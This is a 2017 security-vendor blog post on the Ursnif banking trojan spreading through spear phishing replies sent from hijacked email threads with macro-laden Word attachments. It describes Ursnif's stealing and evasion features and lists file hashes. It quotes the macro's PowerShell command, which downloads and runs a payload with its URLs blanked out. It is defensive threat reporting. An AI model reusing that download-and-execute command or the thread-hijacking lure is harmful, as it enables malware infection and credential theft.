Security Alert
Jonathan Crowe
Nov 2017

Ursnif Trojan Spreading via Innovative Spear Phishing Emails

Photo by anoldent

A new wave of innovative spear phishing emails has been spotted distributing Ursnif, one of the world's most active and widespread banking trojans.

Key Details

  • What makes the spear phishing emails unique: They appear to be using compromised email accounts to reply to active email threads.
  • Payload delivered via Word docs and macros: The emails include a Word doc attachment with a malicious macro that downloads the Ursnif payload.
  • What Ursnif does: Ursnif is a multipurpose trojan designed to steal a wide variety of victim information, from banking and credit card credentials via man-in-the-browser attacks to other passwords and private info via keylogging and screenshots.
  • Getting past many AVs: At the time of this writing, this new variant of Ursnif has a very low detection rate among security products.
  • Blocking Ursnif: Barkly provides multi-layered protection against these attacks by blocking both the Ursnif payload and the macro that attempts to download it in the first place.
  • empty
  • empty
  • empty

Watch Barkly block a Ursnif attack
See the video

Ursnif, one of the world's most active and widespread banking trojans, has been spotted spreading via an innovative spear phishing technique.

What makes the spear phishing emails in these attacks especially dangerous is that they appear to be utilizing the email accounts of previous victims, in some cases even disguising the messages as replies to existing emails.  

Attackers replying to active email chains to spread the infection

In one case, a Barkly user received what appeared to be a response to emails they had been exchanging with contacts at another organization. The new email looked like it was coming from another contact at that organization, who was replying to the previous messages that had been sent.  


The new message was noticeably short: "Morning, please see attached and confirm," but in the context of the email chain it was very convincing. 

The user opened the attachment — a Word document named "Request.doc" (pictured below) — and followed the instructions it provided to enable macros. Because Ursnif deploys evasive anti-sandbox techniques, it actually waits to launch the macro until the Word document is closed. 

Once the document was closed and the macro was launched, Barkly's behavior analysis detected it attempting to execute the following PowerShell code designed to download a malicious payload:

powershell -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('', $env:APPDATA + '\Gdo.exe'); Start-Process $env:APPDATA'\Gdo.exe'; (New-Object System.Net.WebClient).DownloadString(''); IEX((New-Object System.Net.WebClient).DownloadString(''))


By blocking that attempt from executing, Barkly stopped the attack short of payload delivery and prevented the user's machine from being infected.


By preventing the user from being infected, Barkly also prevented them from being turned into a new delivery vehicle for additional attacks, this time sent from their email account to their email contacts.

Unfortunately, this isn't the first time we've spotted a trojan hijacking victim email accounts to deliver more convincing spear phishing emails. In July, we blocked attacks attempting to spread the Emotet trojan in a simliar way. If this is becoming a larger trend it puts even more emphasis on blocking these attacks at the earliest stage possible, before they have a chance to take hold and turn victims into unknowing attackers.

How the Ursnif attack plays out


Video: Watch Barkly in action vs. Ursnif

Wistia video thumbnail - Barkly-vs-Ursnif-Trojan

Thanks for reporting a problem. We'll attach technical data about this session to help us figure out the issue. Which of these best describes the problem?

Any other details or context?


Old trojan, new tricks: Ursnif is evolving 

Ursnif (also known as Gozi) has been an active threat since its discovery in 2007. While, traditionally, its favorite targets have been financial institutions (most recently Japanese banks), it has recently expanded its operations to target a wider variety of organizations as well as a wider variety of credential types.

Most often thought of as a banking trojan, Ursnif now actively seeks out credentials for email accounts, cloud storage accounts, cryptocurrency exchange platforms, and e-commerce sites (in addition to banking and credit card accounts). 

Ursnif is capable of stealing information via a variety of techniques, including web injections, man-in-the-browser functionality, keylogging, screenshot grabbing, and more.  

In recent years, the trojan has been updated with a variety of advanced features designed to help it evade sandboxes and even bypass behavioral biometrics defenses by logging and mimicking the speed and cadence at which users type, move their cursors, and submit their information into form fields.

The latest version of Ursnif being delivered in these spear phishing emails also deletes copies of itself once it has been executed, making it more difficult to detect and analyze. 

We'll continue to monitor Ursnif closely and watch how it evolves. Sign up to receive updates on this and other new threats in your inbox: Subscribe to the blog.


SHA256 hashes:

  • Word doc: 32695d63215d0bd76887f1373b89607f6b73b193f37f044a518afe3db446bd65
  • Macro: bb06ec141b6382a111c20c70898b161f2287dda44a7024b949cc91fab1d3ca62
  • Ursnif payload: 57c9cfa9a41f39059010b6d691a33a774ab38c284d5a6235219de787e9f9b3a0
  • Ursnif payload: 8fa024ea295c9effbc84e9a66d7b5940716897c2c2eaca29ebe5a0fb26d92bbe


  • Macro:,
  • Ursnif payloads:,
Jonathan Crowe

Jonathan Crowe

Jonathan covers the latest threats and cybersecurity trends from a practical perspective.


Close the gaps in your security

See firsthand how Barkly blocks attacks other solutions miss.

See a demo


Stay informed!

Get the latest security news, tips, and trends straight to your inbox.